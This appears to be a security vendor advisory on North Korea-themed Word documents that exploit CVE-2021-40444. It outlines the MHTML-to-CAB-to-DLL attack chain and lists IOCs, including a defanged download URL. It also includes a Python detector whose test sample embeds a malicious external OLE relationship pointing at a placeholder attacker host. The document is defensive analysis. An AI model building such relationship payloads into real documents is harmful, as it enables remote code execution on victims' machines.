North Korea-related Malicious Document Files Using CVE-2021-40444 Vulnerability

The ASEC analysis team has recently discovered malicious document files that exploit CVE-2021-40444, a new vulnerability that Microsoft disclosed in September. It is noteworthy that all of the confirmed document files are North Korea-related materials. North Korea-related malicious files have kept evolving in new ways, and the fact that the attackers are already using a newly disclosed vulnerability shows how quickly they apply new techniques to their distribution.

CVE-2021-40444 is a remote code execution vulnerability in MSHTML, the browser rendering engine used by Internet Explorer and Office applications, so it affects both Internet Explorer and Office document applications. Magniber ransomware has also been exploiting the vulnerability since September and is still being distributed through Internet Explorer.

Office document files that exploit this vulnerability are being distributed under the following filenames, tricking users into thinking that they are North Korea-related materials.

● (2021-1118) Korea Institute for ******** Unification – Graduate School of *********** Joint Seminar Program (final).docx
● +Seminar on Promotion of Cross-border Corporation between Russia, China, and North Korea.docx

The external URL shown in the following figure is used to trigger CVE-2021-40444. The attack proceeds as follows:

  1. Accesses the malicious URL via the MHTML (MIME HTML) protocol
  2. Uses the Office application's built-in browser rendering engine to run JavaScript containing the malicious code
  3. Downloads a CAB file, loads the malicious DLL (carrying an INF extension) contained in the CAB file, and executes the malicious behavior

Figure 1. External URL inside XML file of malicious document
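The external URL in step 1 lives in the document's relationship part, so a defender can triage a .docx offline by scanning its .rels files for external targets that use the mhtml: scheme or load an external OLE object. The following is an added example, not ASEC's tooling; the sample document it scans is constructed in memory and the host name is a placeholder.

```python
"""Flag Office Open XML documents whose relationship parts point at external
MHTML targets, the loading pattern CVE-2021-40444 documents rely on."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def scan_relationships(docx_bytes):
    """Return (part_name, rel_type, target) for every external relationship
    that uses the mhtml: scheme or references an OLE object outside the file."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue  # internal parts cannot reach a remote server
                target = rel.get("Target", "")
                rtype = rel.get("Type", "")
                if target.lower().startswith("mhtml:") or rtype == OLE_REL:
                    hits.append((name, rtype.rsplit("/", 1)[-1], target))
    return hits


def build_sample_docx(rels_xml):
    """Wrap a document.xml.rels part in a minimal .docx (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed relationship parts; ATTACKER-HOST.invalid is a placeholder, not a real IOC.
MALICIOUS_RELS = (
    f'<Relationships xmlns="{REL_NS[1:-1]}">'
    f'<Relationship Id="rId5" Type="{OLE_REL}" TargetMode="External" '
    'Target="mhtml:http://ATTACKER-HOST.invalid/ole/x.html"/></Relationships>'
)
BENIGN_RELS = (
    f'<Relationships xmlns="{REL_NS[1:-1]}">'
    '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument'
    '/2006/relationships/hyperlink" Target="https://www.example.com/" TargetMode="External"/>'
    "</Relationships>"
)

if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        print(label, scan_relationships(build_sample_docx(rels)))
```

An ordinary external hyperlink is not flagged; only mhtml: targets and external OLE objects are, which is the combination the documents described here use.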

Once the malicious behavior has been executed, the text inside the file becomes visible. It details the agenda of a Unification Institution seminar that takes place on November 18.

Figure 2. Detailed text inside North Korea-related document

Given that both North Korea-related document files access the same URL, we suspect that a single attacker authored both files. The server is still up, but access to it is blocked.

As seen here, malicious document files related to North Korea are continuously being distributed using various vulnerabilities. Because the files actually contain North Korea-related material, it is difficult for users to recognize that they are malicious even after opening them, so we advise users to take extra caution.

V3 products detect such files using the following aliases:

Figure 3. V3 detection

[File Detection]
Downloader/XML.Generic
Exploit/XML.Cve-2021-40444.S1697

[IOC Info]
1132d2a12b6fd6cbbc8046df3612d725
2edbab4834a1315b476278fb6ed2592f
809c4c40537c60e224363b94296fbbf2
hxxp://officeversion[.]mywebcommunity[.]org/ole/

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
